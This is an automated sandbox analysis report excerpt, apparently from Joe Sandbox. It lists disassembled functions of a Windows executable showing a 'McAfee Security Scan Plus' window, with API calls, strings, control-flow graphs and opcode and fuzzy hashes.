                                • Instruction Fuzzy Hash: 11616C74B01246CBE745CF3EF848706BBA2F7C4314F4495A5D4045B316EBB85C29DB9A
                                Function 003FD2A0 Relevance: .1, Instructions: 113COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentHandleModuleProcess
                                • String ID:
                                • API String ID: 65871501-0
                                • Opcode ID: 990a8e48d40559c324804b157da6bd32262217e06847ffbfe270420d5c7e5150
                                • Instruction ID: 6f2c2909d9a92e6a0b86cf1c6a1141e1223fd5e31827d999f8df5af589125d74
                                • Opcode Fuzzy Hash: 990a8e48d40559c324804b157da6bd32262217e06847ffbfe270420d5c7e5150
                                • Instruction Fuzzy Hash: 4B418DB5D043489FDB11CFA9C8447AEBBF4FB09304F10426EE955A7381EB756A48CB91
                                Function 00402690 Relevance: 101.8, APIs: 8, Strings: 50, Instructions: 271COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetNativeSystemInfo.KERNEL32(?), ref: 00402A7A
                                • GetLargePageMinimum.KERNEL32 ref: 00402AA2
                                • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00402AB3
                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00402BA9
                                • GetModuleHandleW.KERNEL32(KernelBase.dll), ref: 00402BF3
                                • GetLastError.KERNEL32 ref: 00402C2F
                                  • Part of subcall function 00402C60: GetProcAddress.KERNEL32(00000000,?), ref: 00402D83
                                • GetLastError.KERNEL32 ref: 00402C3A
                                • GetLastError.KERNEL32 ref: 00402C42
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorHandleLastModule$AddressInfoLargeMinimumNativePageProcSystem
                                • String ID: DeleteProcThreadAttributeList$InitializeProcThreadAttributeList$KernelBase.dll$LdrFindEntryForAddress$LdrRegisterDllNotification$LdrUnregisterDllNotification$NtClose$NtCompareTokens$NtCreateDirectoryObjectEx$NtCreateFile$NtCreateSymbolicLinkObject$NtFsControlFile$NtOpenFile$NtPowerInformation$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQueryEaFile$NtQueryFullAttributesFile$NtQueryInformationByName$NtQueryInformationFile$NtQueryInformationProcess$NtQueryInformationThread$NtQueryLicenseValue$NtQueryObject$NtQuerySection$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtQueryVolumeInformationFile$NtResumeProcess$NtSetEaFile$NtSetInformationFile$NtSetInformationProcess$NtSuspendProcess$NtWow64ReadVirtualMemory64$ProcessIdToSessionId$QueryInterruptTime$QueryInterruptTimePrecise$QueryUnbiasedInterruptTimePrecise$RtlGetNtVersionNumbers$RtlGetOwnerSecurityDescriptor$RtlUnicodeToUTF8N$SetProcessDEPPolicy$SetProcessMitigationPolicy$SetSearchPathMode$SetThreadDescription$UpdateProcThreadAttribute$VirtualProtect$kernel32.dll$ntdll.dll
                                • API String ID: 871164704-2839307195
                                • Opcode ID: 5576ba9b86849a80563f6e86774a2ccf2593322dcac9ae1b0b56b3b023698333
                                • Instruction ID: b7522c3fc8fc10e5ec40f3b4bf9c1064ceb748ebb8959aca406198028d11ff47
                                • Opcode Fuzzy Hash: 5576ba9b86849a80563f6e86774a2ccf2593322dcac9ae1b0b56b3b023698333
                                • Instruction Fuzzy Hash: 7CE1E7B1405B448BE361CF61C498BD7BBF8BF44308F048A1EE5AB96650DBB9B14CCB95
                                Function 003EF990 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 270windowregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,0000006B,A05DD77D,?), ref: 003EFA02
                                • LoadIconW.USER32(00000000), ref: 003EFA0F
                                • LoadCursorW.USER32(00000000,00007F00), ref: 003EFA1E
                                • LoadIconW.USER32(?,0000006B), ref: 003EFA50
                                • RegisterClassExW.USER32(00000030), ref: 003EFA5F
                                • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Windows Desktop Guided Tour,00000000), ref: 003EFA78
                                • CreateWindowExW.USER32(00000000,MSSP,McAfee Security Scan Plus,00CF0000,00000000,00000000,?,00000000), ref: 003EFAB7
                                • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Windows Desktop Guided Tour,00000000), ref: 003EFAD6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Load$IconMessage$ClassCreateCursorHandleModuleRegisterWindow
                                • String ID: 0$Call to CreateWindow failed!$Call to RegisterClassEx failed!$MSSP$MSSPWebEB$McAfee Security Scan Plus$McAfee Security Scan Plus$Windows Desktop Guided Tour
                                • API String ID: 3932116867-1317735066
                                • Opcode ID: 5975adcc274b7b1cf33e115d8f6f710ff3a01e5ec319f37b37053a5ba15d8e79
                                • Instruction ID: eea96783a16ce7c56c800205ab3915e196e871bec9d5450592bee46c0e7abd31
                                • Opcode Fuzzy Hash: 5975adcc274b7b1cf33e115d8f6f710ff3a01e5ec319f37b37053a5ba15d8e79
                                • Instruction Fuzzy Hash: 10A10875A40319AFEB209F60DC4DF9A7B74BB04704F2042A5FA08A72D0EBF55A54CF59
                                Function 004070B0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 224 4070b0-4070ee GetCurrentProcess IsWow64Process 225 4070f4-40710c 224->225 226 40721a-407235 GetLastError 224->226 227 40711a-40713b GetCurrentProcess IsWow64Process2 225->227 228 40710e-407110 225->228 229 40723d-407260 GetLastError 226->229 227->229 231 407141-40715f 227->231 228->227 230 407112-407116 228->230 232 407162-407168 229->232 230->227 231->232 233 407176-407184 232->233 234 40716a-40716c 232->234 236 407265-407268 233->236 237 40718a 233->237 234->233 235 40716e-407172 234->235 235->233 238 40718f-4071ad CreateFileW 236->238 237->238 239 4071d1-4071e4 call 425711 238->239 240 4071af-4071c4 GetFinalPathNameByHandleW 238->240 241 4071e5-4071ea 240->241 242 4071c6-4071c8 240->242 241->242 246 4071ec-4071fd 241->246 242->239 244 4071ca-4071cb CloseHandle 242->244 244->239 247 407206-407219 call 425711 246->247 248 4071ff-407200 CloseHandle 246->248 248->247
                                APIs
                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 004070DF
                                • IsWow64Process.KERNEL32(00000000), ref: 004070E6
                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 0040712C
                                • IsWow64Process2.KERNELBASE(00000000), ref: 00407133
                                • CreateFileW.KERNEL32(?,00100080,00000007,00000000,00000003,02000000,00000000), ref: 004071A2
                                • GetFinalPathNameByHandleW.KERNEL32(00000000,\\?\C:\Windows,00000100,00000000), ref: 004071BC
                                • CloseHandle.KERNEL32(00000000), ref: 004071CB
                                • CloseHandle.KERNEL32(00000000), ref: 00407200
                                • GetLastError.KERNEL32 ref: 0040721A
                                • GetLastError.KERNEL32 ref: 0040723D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: HandleProcess$CloseCurrentErrorLastWow64$CreateFileFinalNamePathProcess2
                                • String ID: \\?\C:\Windows
                                • API String ID: 2836744321-641808500
                                • Opcode ID: 3bae3f3843dc899a0f64d81daf9a8d42028df3d59ca79975358020a9ca6086d2
                                • Instruction ID: e30ee83700e47513f3ebd4f1eda3b31654a2f2d1c890ed119358a9931c281381
                                • Opcode Fuzzy Hash: 3bae3f3843dc899a0f64d81daf9a8d42028df3d59ca79975358020a9ca6086d2
                                • Instruction Fuzzy Hash: 6D51B674E052059FDB10DFA5DC457AE7BB4AF09700F10417AE811FB3D1EB79AA048B9A
                                Function 003FEA40 Relevance: 16.3, APIs: 7, Strings: 2, Instructions: 528COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 251 3fea40-3fea56 252 3fea88-3fea8e 251->252 253 3fea58-3fea5d 251->253 254 3feb8d call 3e2130 252->254 255 3fea94-3fea9f 252->255 256 3fea5f 253->256 257 3fea61-3fea66 253->257 263 3feb92-3fec17 call 4291af 254->263 261 3feaad-3feaba 255->261 262 3feaa1-3feaab 255->262 256->257 259 3fea68-3fea74 257->259 260 3fea77-3fea85 257->260 259->260 265 3feabc-3feac6 261->265 266 3feac8-3fead8 261->266 264 3feae7-3feaec 262->264 281 3fec1d-3fec20 263->281 282 3ff0b0-3ff0bf 263->282 269 3feb88 call 3e2090 264->269 270 3feaf2-3feafd call 42571f 264->270 265->264 268 3feade-3feae5 266->268 266->269 268->264 272 3feb0e-3feb10 268->272 269->254 270->263 283 3feb03-3feb0c 270->283 277 3feb1f 272->277 278 3feb12-3feb1d call 42571f 272->278 280 3feb21-3feb2c 277->280 278->280 286 3feb2e-3feb3a 280->286 287 3feb3d-3feb49 280->287 288 3fec34 281->288 289 3fec22-3fec32 281->289 285 3ff092-3ff0af call 425711 282->285 283->280 286->287 290 3feb7b-3feb85 287->290 291 3feb4b-3feb5a 287->291 292 3fec3e-3fec46 288->292 289->288 289->292 294 3feb6e-3feb78 call 4259a5 291->294 295 3feb5c-3feb6a 291->295 296 3fec4c-3fec5c 292->296 297 3ff0c1 292->297 294->290 295->263 300 3feb6c 295->300 302 3fec5e-3fec65 call 400980 296->302 303 3fec79-3fecaf call 3e21d0 296->303 299 3ff0c8-3ff0db 297->299 300->294 311 3fec67-3fec6e 302->311 312 3fec73 302->312 309 3fecb5-3fecbb 303->309 310 3fecb1-3fecb3 303->310 313 3fecbf-3fecef GetFileVersionInfoSizeExW 309->313 310->309 310->313 311->299 312->303 314 3fecf5-3fed2b call 3fe9d0 GetFileVersionInfoExW 313->314 315 3ff0e0-3ff0fb GetLastError 313->315 318 3ff107-3ff122 GetLastError 314->318 319 3fed31-3fed55 call 3fe8b0 call 3e22e0 314->319 321 3ff12e call 4291af 318->321 328 3fed89-3feda1 319->328 329 3fed57-3fed69 319->329 325 3ff133-3ff146 call 3fa380 call 3f51a0 321->325 325->285 328->325 330 3feda7-3fede4 VerQueryValueW 328->330 332 3fed7f-3fed86 call 4259a5 329->332 333 3fed6b-3fed79 329->333 335 3ff1ad-3ff1c6 GetLastError call 3f51a0 330->335 336 3fedea-3fedf1 330->336 332->328 333->321 333->332 335->285 336->335 339 3fedf7-3fee02 336->339 342 3fee08-3fee0a 339->342 344 3ff009-3ff01d 342->344 345 3fee10-3fee19 342->345 346 3ff01f-3ff022 344->346 347 3ff062-3ff067 344->347 348 3fee1b-3fee1e 345->348 349 3fee24-3fee85 call 3fcf60 call 4000b0 345->349 350 3ff024-3ff02a 346->350 351 3ff071-3ff073 346->351 347->351 352 3ff069-3ff06d 347->352 348->349 353 3ff14b-3ff16a call 3feba0 348->353 372 3feeda-3feee2 349->372 373 3fee87-3feed5 GetLastError call 3ffaa0 call 3f51a0 call 3e22e0 349->373 350->351 355 3ff02c-3ff03e 350->355 351->285 352->351 364 3feffb-3ff004 353->364 365 3ff170-3ff185 call 3f51a0 353->365 358 3ff054-3ff060 call 4259a5 355->358 359 3ff040-3ff04e 355->359 358->285 359->358 362 3ff1a8 call 4291af 359->362 362->335 364->342 365->285 375 3ff18a-3ff196 372->375 376 3feee8-3fef0f 372->376 373->342 379 3ff19e call 4291af 375->379 378 3fef15-3fef1e 376->378 378->378 381 3fef20-3fef68 call 3e21d0 call 3ffaa0 378->381 385 3ff1a3 call 4291af 379->385 392 3fefab-3fefb0 381->392 393 3fef6a-3fef6d 381->393 385->362 395 3fefba-3fefc4 392->395 396 3fefb2-3fefb6 392->396 394 3fef6f-3fef75 393->394 393->395 394->395 397 3fef77-3fef89 394->397 395->364 398 3fefc6-3fefdb 395->398 396->395 399 3fef9f-3fefa9 call 4259a5 397->399 400 3fef8b-3fef99 397->400 401 3fefdd-3fefeb 398->401 402 3feff1-3feff8 call 4259a5 398->402 399->395 400->379 400->399 401->385 401->402 402->364
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003FEB88
                                • GetFileVersionInfoSizeExW.KERNELBASE(00000001,00000000,?,?,?,A05DD77D,?), ref: 003FECE1
                                • GetFileVersionInfoExW.KERNELBASE(00000002,?,00000000,?,?,00000000), ref: 003FED23
                                • VerQueryValueW.KERNELBASE(?,\VarFileInfo\Translation,?,?,?), ref: 003FEDDC
                                • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 003FEE87
                                Strings
                                • \StringFileInfo\%04x%04x\%ls, xrefs: 003FEE3F
                                • \VarFileInfo\Translation, xrefs: 003FEDD0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileInfoVersion$Concurrency::cancel_current_taskErrorLastQuerySizeValue
                                • String ID: \StringFileInfo\%04x%04x\%ls$\VarFileInfo\Translation
                                • API String ID: 1091494215-3503296632
                                • Opcode ID: 8669ef736f0aab023187125335c764e837a7c8c236bcc44f60cfec3558b1ac3c
                                • Instruction ID: b336c0b3fe0a2d6b113433204163dd2aa770c949e755940b739025a8975e39c8
                                • Opcode Fuzzy Hash: 8669ef736f0aab023187125335c764e837a7c8c236bcc44f60cfec3558b1ac3c
                                • Instruction Fuzzy Hash: 75129271A01219DFEF25DF68CC84BADB7B5BF44304F1082A9E909973A1DB749E44CB51
                                Function 003EF54F Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 265COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 407 3ef54f-3ef564 408 3ef57a-3ef602 call 4259a5 call 3e23a0 call 3e21d0 call 3ef180 407->408 409 3ef566-3ef574 407->409 422 3ef608-3ef648 call 3e23a0 408->422 423 3ef6b7-3ef6be 408->423 409->408 410 3ef985-3ef98a call 4291af 409->410 422->423 435 3ef64a-3ef651 422->435 424 3ef6cf-3ef6ea K32EnumProcesses 423->424 425 3ef6c0-3ef6cc call 3ee7b0 423->425 428 3ef6ec-3ef6f9 424->428 429 3ef747-3ef78b call 3e23a0 424->429 425->424 433 3ef72d-3ef734 428->433 434 3ef6fb 428->434 444 3ef78d-3ef7b0 call 3f0780 429->444 445 3ef7c8-3ef800 call 3e23a0 429->445 440 3ef736-3ef742 call 3ee7b0 433->440 441 3ef745 433->441 437 3ef700-3ef709 434->437 438 3ef653-3ef664 call 3ee7b0 435->438 439 3ef6b0-3ef6b2 435->439 446 3ef70b-3ef71c call 3f5630 call 3fab50 437->446 447 3ef728-3ef72b 437->447 442 3ef929-3ef932 438->442 439->442 440->441 441->429 454 3ef934-3ef949 442->454 455 3ef965-3ef982 call 425711 442->455 463 3ef7bc-3ef7c2 444->463 464 3ef7b2-3ef7b7 444->464 467 3ef802-3ef825 call 3f0780 445->467 468 3ef831-3ef849 GetDC 445->468 473 3ef721-3ef726 446->473 447->433 447->437 456 3ef95b-3ef962 call 4259a5 454->456 457 3ef94b-3ef959 454->457 456->455 457->410 457->456 463->445 464->442 467->468 477 3ef827-3ef82c 467->477 470 3ef84b-3ef878 GetDeviceCaps * 2 ReleaseDC 468->470 471 3ef880-3ef8b5 call 439f00 call 3f14a0 468->471 470->471 481 3ef8c6-3ef924 GetDesktopWindow GetClientRect call 3ef990 471->481 482 3ef8b7-3ef8c3 call 3ee7b0 471->482 473->433 473->447 477->442 481->442 482->481
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: /help$Local\{46C61DD2-00A3-46F1-B456-3E6CDCEF89B7}
                                • API String ID: 0-3953150669
                                • Opcode ID: 004089ab57447c5d832a4e6a176fb0750575af804b800db0c1c95334b16e47ef
                                • Instruction ID: af3ebfd3b28d50f7c9965284fda9c22b8880261752afbb94b0c3f2a4f791bf4a
                                • Opcode Fuzzy Hash: 004089ab57447c5d832a4e6a176fb0750575af804b800db0c1c95334b16e47ef
                                • Instruction Fuzzy Hash: CEA18871A002A4DFDB219F25ED4479E73B5AB08341F1006B9EA48A72E1E7F59EC0CF95
                                Function 003E89A0 Relevance: 12.8, APIs: 6, Strings: 1, Instructions: 503threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 486 3e89a0-3e8a17 call 42deb1 489 3e8a2c-3e8a3e GetCurrentThread SetThreadPriority 486->489 490 3e8a19-3e8a28 GetCurrentThread SetThreadDescription 486->490 491 3e8a4f-3e8a99 call 3f5300 call 3ffe90 489->491 492 3e8a40-3e8a4c call 3ee7b0 489->492 490->489 499 3e8aa0-3e8aa2 491->499 492->491 500 3e8aa8-3e8aab 499->500 501 3e8c30-3e8c37 499->501 504 3e8f8a-3e8f91 500->504 505 3e8ab1 500->505 502 3e8c48-3e8c50 501->502 503 3e8c39-3e8c45 call 3ee7b0 501->503 507 3e8ca2-3e8ca7 502->507 508 3e8c52-3e8c5c 502->508 503->502 510 3e8f97-3e8f9e 504->510 511 3e8ab3-3e8ae1 call 3ffe90 call 4398d0 504->511 509 3e8afd-3e8b24 call 424cbf 505->509 512 3e8cbf-3e8cdc call 425711 507->512 513 3e8ca9-3e8cb1 GetCurrentThreadId 507->513 508->507 516 3e8c5e-3e8c65 508->516 530 3e904e-3e9055 509->530 531 3e8b2a-3e8b77 509->531 518 3e8fa0-3e8faf call 3ee7b0 510->518 519 3e8fb1-3e8fd5 call 424cbf call 424cdb 510->519 548 3e8aeb-3e8aed 511->548 549 3e8ae3-3e8ae5 511->549 513->512 521 3e8cb3-3e8cb7 513->521 524 3e8c76-3e8c90 516->524 525 3e8c67-3e8c73 call 3ee7b0 516->525 518->519 552 3e8fd7-3e8fd9 519->552 521->512 529 3e8cb9 521->529 550 3e8c9c 524->550 551 3e8c92-3e8c98 524->551 525->524 529->512 537 3e8b2c-3e8b60 call 3f6990 call 3f8b20 530->537 538 3e905b-3e906a call 3ee7b0 530->538 546 3e8b7d-3e8b82 531->546 547 3e8cf3-3e8cfa 531->547 577 3e906f-3e9077 call 424cdb 537->577 578 3e8b66 537->578 538->537 556 3e8b84-3e8ba2 546->556 557 3e8ba5-3e8bb6 546->557 547->546 555 3e8d00-3e8d05 547->555 548->509 559 3e8aef 548->559 549->548 558 3e902b-3e9034 call 3e90e0 549->558 550->507 551->550 552->501 560 3e8fdf-3e9029 call 3e7740 call 3f4cb0 call 3f4f20 552->560 555->546 562 3e8d0b-3e8d14 555->562 556->557 563 3e8bb8-3e8bc3 call 424cdb 557->563 564 3e8bc6-3e8bc8 557->564 574 3e9039-3e9049 call 3ffe90 558->574 559->558 566 3e8af5-3e8af7 559->566 560->552 571 3e8d16-3e8d20 562->571 572 3e8d22 562->572 563->564 567 3e8bce-3e8bdb call 3e9660 564->567 568 3e907c-3e9083 564->568 566->509 566->558 587 3e8ed5-3e8ede 567->587 591 3e8be1-3e8be8 567->591 568->567 579 3e9089-3e90a2 call 3ee7b0 568->579 580 3e8d25-3e8d36 call 4247d2 571->580 572->580 574->509 577->568 578->587 579->567 595 3e8d3c-3e8d41 580->595 596 3e90d2-3e90d8 call 424c11 580->596 587->499 597 3e8bea-3e8c00 call 3ee7b0 591->597 598 3e8c03-3e8c1a call 424cbf 591->598 600 3e90c8-3e90cd call 3e7260 595->600 601 3e8d47-3e8d4b 595->601 597->598 612 3e90a7-3e90ae 598->612 613 3e8c20-3e8dde 598->613 600->596 601->600 607 3e8d51-3e8d75 call 424cdb call 42397a 601->607 607->600 628 3e8d7b-3e8da4 call 4247f7 call 3f9e70 call 424cbf 607->628 616 3e90b4-3e90c3 call 3ee7b0 612->616 617 3e8c25-3e8c2d call 424cdb 612->617 619 3e8de1-3e8de7 613->619 616->617 617->501 624 3e8e1b-3e8e3d call 3f86e0 619->624 625 3e8de9-3e8def 619->625 635 3e8ec5-3e8ed2 call 424cdb 624->635 636 3e8e43-3e8e48 624->636 629 3e8e07-3e8e19 call 3f6af0 625->629 630 3e8df1-3e8e05 call 3f8a10 625->630 657 3e8daa-3e8db2 628->657 658 3e8cf0 628->658 629->619 630->619 635->587 640 3e8e4a-3e8e4f 636->640 641 3e8e51-3e8e53 636->641 640->636 640->641 641->635 644 3e8e55-3e8e5d 641->644 647 3e8e5f 644->647 648 3e8e85-3e8e87 644->648 650 3e8e60-3e8e65 647->650 648->635 651 3e8e89-3e8e91 648->651 653 3e8e78-3e8e80 650->653 654 3e8e67-3e8e75 call 3fa080 650->654 655 3e8eb2-3e8ec2 call 3f86e0 651->655 656 3e8e93-3e8eaa call 3fa080 651->656 653->650 664 3e8e82 653->664 654->653 655->635 668 3e8eac-3e8eaf 656->668 660 3e8db8-3e8dc6 657->660 661 3e8ce0-3e8ce7 657->661 658->547 660->661 670 3e8dcc-3e8dd3 660->670 661->658 664->648 668->655 670->661
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 003E8A19
                                • SetThreadDescription.KERNELBASE(00000000,framework: com), ref: 003E8A25
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 00424CDB: RtlReleaseSRWLockExclusive.NTDLL(00000000), ref: 00424CE1
                                • GetCurrentThread.KERNEL32 ref: 003E8A2E
                                • SetThreadPriority.KERNEL32(00000000), ref: 003E8A31
                                • GetCurrentThreadId.KERNEL32 ref: 003E8CA9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Thread$Current$DescriptionExclusiveInterruptLockPrecisePriorityQueryReleaseTimeUnbiased
                                • String ID: framework: com
                                • API String ID: 2759220540-887911046
                                • Opcode ID: cd12f6c1c50b136a562d81de8ef6fa4ed2cfc6d26b611a99fc7ea0c170ca464f
                                • Instruction ID: 8cc9fdffe6d7ca3b572714e937423f1f887e904dae2aeff675b00f4baa9aac51
                                • Opcode Fuzzy Hash: cd12f6c1c50b136a562d81de8ef6fa4ed2cfc6d26b611a99fc7ea0c170ca464f
                                • Instruction Fuzzy Hash: AB12E170E002A8DFDB16DFA9D840BADFBB1BF44304F154259E409AB2C1EB74AD54CB95
                                Function 003FEBA0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 239COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
